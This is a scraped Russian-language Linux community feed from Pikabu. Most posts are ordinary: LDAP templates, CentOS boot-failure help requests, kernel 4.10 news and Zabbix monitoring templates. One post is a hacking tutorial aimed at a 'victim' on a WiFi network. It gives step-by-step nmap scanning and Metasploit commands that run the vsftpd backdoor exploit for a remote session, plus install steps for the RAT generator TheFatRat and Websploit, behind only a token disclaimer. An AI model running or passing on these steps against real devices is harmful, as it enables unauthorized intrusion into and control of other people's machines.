Сообщество - GNU/Linux
Добавить пост

GNU/Linux

1 030 постов 15 516 подписчиков

Популярные теги в сообществе:

Шаблоны для создания объектов в phpLDAPAdmin.

Хочу предложить Вашему вниманию первую из статей по LDAP.


phpLDAPAdmin (PLA) — веб интерфейс для управления каталогом LDAP, написанный на PHP.


Вот список шаблонов для создания объектов:

• Домен Samba

• Группа Samba

• Пользователь Samba

• DHCP хост

• Пользователь FTP сервера

• Группа (Posix)

• Пользователь (Posix)

• Псевдоним объекта LDAP

• Подразделение

• Простой объект безопасности

• Почтовая группа

• Псевдоним хоста DNS

• IP-адрес хоста DNS

• IP-адрес хоста в обратной зоне DNS


Ссылка на страницу о phpLDAPAdmin.

Ссылка на шаблоны для создания объектов.

Показать полностью

Крах системы. Требуется совет бывалых.

Доброе утро Пикабу, я снова к вам за помощью друзья), как говорится одна голова хорошо- две еще лучше! Суть такая есть есть, т.е был сервер, его роль как рабочая станция со спец. софтом под тем же CentOSом, он стал жутко подвисать. Оператор его перезагрузил и сказал что был черный экран, затем шкала c выполнением процессов, как я понял со слов система повредилась и фиксилась, после этого он загрузился но снова подвисал, 2 ребут и система встала с такой вот картинкой, я так понимаю что раздел не видит, хотелось бы узнать может кто сталкивался с подобным, с чего начать, не хотелось бы терять данные...

Крах системы. Требуется совет бывалых. Centos, Linux, Сисадмин, Помощь

в системе 4 диска, но в биосе во 2ом слоте устройство есть, но не определено, диск умер?

Крах системы. Требуется совет бывалых. Centos, Linux, Сисадмин, Помощь
Показать полностью 2

Вышло новое обновление ядра 4.10

19-го февраля Линус Торвальдс представил ветку Linux 4.10, включающую множество улучшений, в особенности новые функции защиты и поддержку новейших компонентов оборудования.


Релиз находился в разработке на протяжении семи прошлых недель, в течение которых он получил в общей сложности восемь снапшотов Release Candidate.


«В целом разработка 4.10 завершилась не так скромно, как ожидалось изначально. После огромного релиза 4.9 я ожидал, что многие вещи не будут столь значимыми, но получился довольно средний по современным меркам ядра релиз. В итоге мы имеем примерно 13 000 коммитов (исключая подсчёт коммитов слияния — это ещё примерно 1200)», — сообщил Линус Торвальдс в анонсе.


Из заметных изменений:


поддержка Virtual GPU (презентация);

новая утилита perf c2c (может быть использована для анализа Cache Line Contention на системах NUMA);

возможность ручного распределения кэшей L2/L3 между группам процессов (Intel Cache Allocation Technology, статья);

хуки eBPF для cgroups;

гибридный опрос блоков;

улучшение управления обратной записью (writeback management, статья).

В 4.10 добавлен новый «perf sched timehist» для предоставления детальной истории планируемых задач, кроме того, для MD RAID 5 появилась экспериментальная поддержка FAILFAST и кэша обратной записи.


Также в новую версию вошло огромное число улучшений для разных файловых систем: EXT4, F2FS, XFS, OverlayFS, CIFS, UBIFS, BEFS. Удалена давно никем не поддерживаемая LogFS. Была значительно улучшена поддержка архитектуры ARM. Обновлены многочисленные драйверы, в особенности драйвер GPU для AMD Radeon.

Показать полностью

Помощи постЪ

Помощи постЪ Linux, Сисадмин, Помощь, Длиннопост
Помощи постЪ Linux, Сисадмин, Помощь, Длиннопост
Помощи постЪ Linux, Сисадмин, Помощь, Длиннопост

Суть такова, была у меня тачка в офисе которая была собрана до начало времен, ну так вот недавно ее потребовалось запустить, но тут оказалась села батарейка Bios , ее заменили и тачка больше не грузится, ковырял Bios, толку ноль, на борту CentOS, есть предположение что слетел Grub, но  признаки обычно же не такие. Больше склоняюсь к неверной настройке sata. Может кто что подскажет?

Показать полностью 3

Шаблон для мониторинга состояния ИБП APC через APCUPSd в Zabbix.

Предлагаю Вашему вниманию шаблон для мониторинга состояния ИБП APC (без SNMP) через APCUPSd, с которым взаимодействует Zabbix агент.


Переменные:

• Имя

• Текущий статус

• Уровень заряда батареи

• Внутренняя температура

• Напряжение на входе

• Уровень нагрузки

• Уровень чувствительности

• Количество переходов на питание от батареи с момента запуска apcupsd


Примеры файлов для настройки Zabbix агент здесь.


Это ссылка на Share.Zabbix.com

Шаблон для мониторинга принтеров Kyocera в Zabbix

Предлагаю Вашему вниманию шаблон для мониторинга по SNMP принтеров Kyocera в Zabbix.


Список поддерживаемых принтеров:

• FS-1020DN

• FS-1030DN

• FS-4000DN

• FS-1060DN


Список переменных:

• Имя

• Модель

• Серийный номер

• Местоположение

• Контактная информация

• MAC адрес

• Сетевой интерфейс

• Общее количество отпечатанных страниц

• Код ошибки

• Строка состояния 1

• Строка состояния 2

• Тип картриджа

• Максимальное кол-во тонера

• Текущее кол-во тонера

• Текущее кол-во тонера в %

• Время работы с момента последнего включения


Вот ссылка на Share.Zabbix.com

Показать полностью

<Обучение от малого до великого> //Хакерство (Крэкерство) #6.

Предупреждение! Всё ниже описанное я не призываю исполнять и повторять, а лишь рассказываю и обучаю, чтобы вы могли знать как собран механизм взлома/обмана/и т.п.


В данной статье мы рассмотрим способ взлома устройств через WiFi сеть при помощи эксплоитов. Эксплойт- это программа, при установке которой вы сможете удалённо управлять устройством жертвы. Вы сможете копировать, удалять, изменять файлы, а так же проводить махинации с самой системой, например как её выключение, перезагрузка и т.п. Фактически Exploits- это те же самые RAT-вирусы дающие полный контроль над системой машины. Передаются данные эксплоиты при помощи WiFi через открытые порты в машине жертвы.


Мы рассмотрим один из множества примеров взлома устройств при помощи эксплоитов.


Приступим к данной махинации.

В основном при совершении данной атаки используется связка двух программ: nmap+metasploit.

1.Nmap- выявляет в сети устройства, а так же предоставляет информацию об открытых портах.

2.Metasploit- собственно основа данного метода при помощи которой вы будете заражать эксплоитами машину-цель.

Начнём практику.

root@571:~#msfconsole (в одном окне терминала)

root@571:~#nmap 192.168.1.1(<--IP-роутера)/24 (в другом окне терминала)

root@571:~#nmap 192.168.1.4(<--IP_жертвы) -sV -O -v -A

(При помощи данной команды мы узнаем открытые порты данной машины через которые будут проникать эксплоиты)

(В открывшемся окне metasploit:)

msf>search vsftpd (<-- указываете данную программу, она будет показана в nmap напротив одного из открытых портов под таблицей "VERSIONS")

...Если программа найдёт данный эксплоит, тогда выведится строка в которой будет путь к файлу...

msf>use exploit/unix/ftp/vsftpd (<--путь к файлу)

msf exploit(vsftpd)>show options

...Строка напротив RHOST будет пуста и в неё надо будет вписать IP-жертвы...

msf exploit(vsftpd)>set RHOST 192.168.1.4 (<--IP-жертвы)

msf exploit(vsftpd)>exploit (<-- Запуск программы)

В итоге, если нашлись сессии (sessions) вас автоматически подключит к удалённому доступу.

Можете воспользоваться командой help, чтобы узнать все функции.


Ещё есть иной способ искать нужные эксплоиты по ОС:

root@571:~#searchsploit Windows (<--Указываем Операционную Систему)


Так же можно упомянуть о таких программах как TheFatRat и Websploit. Их нет в оригинальной сборке Kali, так что придётся их докачивать отдельно. Давайте разберём, что представляют собой данные программы.

1) TheFatRat- это программа создания RAT-вируса или же Эксплоитов.

2) Websploit- многофункциональная программа для нахождения уязвимостей в сайтах, заражении устройств в WiFi сети эксплоитами и проведении MITM атак.


1) Установка TheFatRat:

root@571:~#git clone https://github.com/screetsec/TheFatRat.git

root@571:~#cd TheFatRat

root@571:~#cd setup

root@571:~#chmod +x setup.sh && ./setup.sh

root@571:~#cd TheFatRat

root@571:~#chmod +x powerfull.sh

root@571:~#./fatrat (<--Запуск программы)


2) Установка Websploit:

root@571:~#apt install websploit

root@571:~#websploit (<--Запуск программы)

wsf>help

wsf>show modules


Далее вы уже можете сами понять что и как действовать, если обладаете достаточными знаниями английского языка, т.к. программы полностью автоматизированы. Если же вы плохо знаете английский, тогда можете посмотреть в YouTube любую инструкцию связанную с данной программой.


На этой весёлой ноте в принципе можно уже закончить обучение. НО, попрошу вас заметить, что недавно мы создали сообщество связанное с Linux'ом/Хакерством/Крэкерством в ВК. Нам нужны люди, разбирающиеся хорошо в Kali Linux (либо других дистрибутивах для пентестинга), знающие методы и подходы различных способов Крэкерства/Хакерства. Если вы один из таких людей, можете присоединится к нам. В данном сообществе стоит главное правило: "Всегда Делиться Информацией". Это правило относится совершенно ко всем членам нашего общества. Так что как и мы, так и вы найдёте много чего полезного в сфере данной тематики. Чтобы присоединится к нашему коллективу, напишите мне в ВК, я обязательно отвечу.


Связаться со мной можно в ВК: https://vk.com/hydra571.

<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Exploits, Хакеры, Крэкерство, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Exploits, Хакеры, Крэкерство, Длиннопост
<Обучение от малого до великого> //Хакерство (Крэкерство) #6. Kali, Linux, Обучение, Exploits, Хакеры, Крэкерство, Длиннопост
Показать полностью 3

Релизнулось ядро Linux 4.10.

Особенно доставляет то, что в апстриме теперь Intel GVT-g:

Реализована технология виртуализации GPU Intel GVT-g для гипервизора KVM (KVMGT), которая позволяет предоставить для каждого виртуального окружения отдельный виртуальный GPU, в котором при выполнении требующих высокой производительности операций могут быть задействованы ресурсы реального системного GPU. Виртуальный GPU позволяет использовать внутри гостевых систем обычные видеодрайверы, не требующие вмешательства гипервизора для обеспечения должной производительности. В итоге, KVMGT позволяет добиться хорошего баланса между производительностью, функциональностью и совместным использованием ресурсов, приближая производительность виртуализированной графической подсистемы к конфигурациям с полным пробросом GPU, но предоставляя возможность совместного использования GPU между виртуальными машинами без применения полной эмуляции или трансляции API DirectX/OpenGL;

(opennet.ru)

Ну и еще куча приятных мелочей, которые упоминать здесь не буду.

Хоть я и предпочитаю амд из-за привычки и опенсорсных фишек, вынужден отметить, что амд, что нвидиа тут соснули по полной, их аналоги по стоимости даже не близко.

Отличная работа, все прочитано!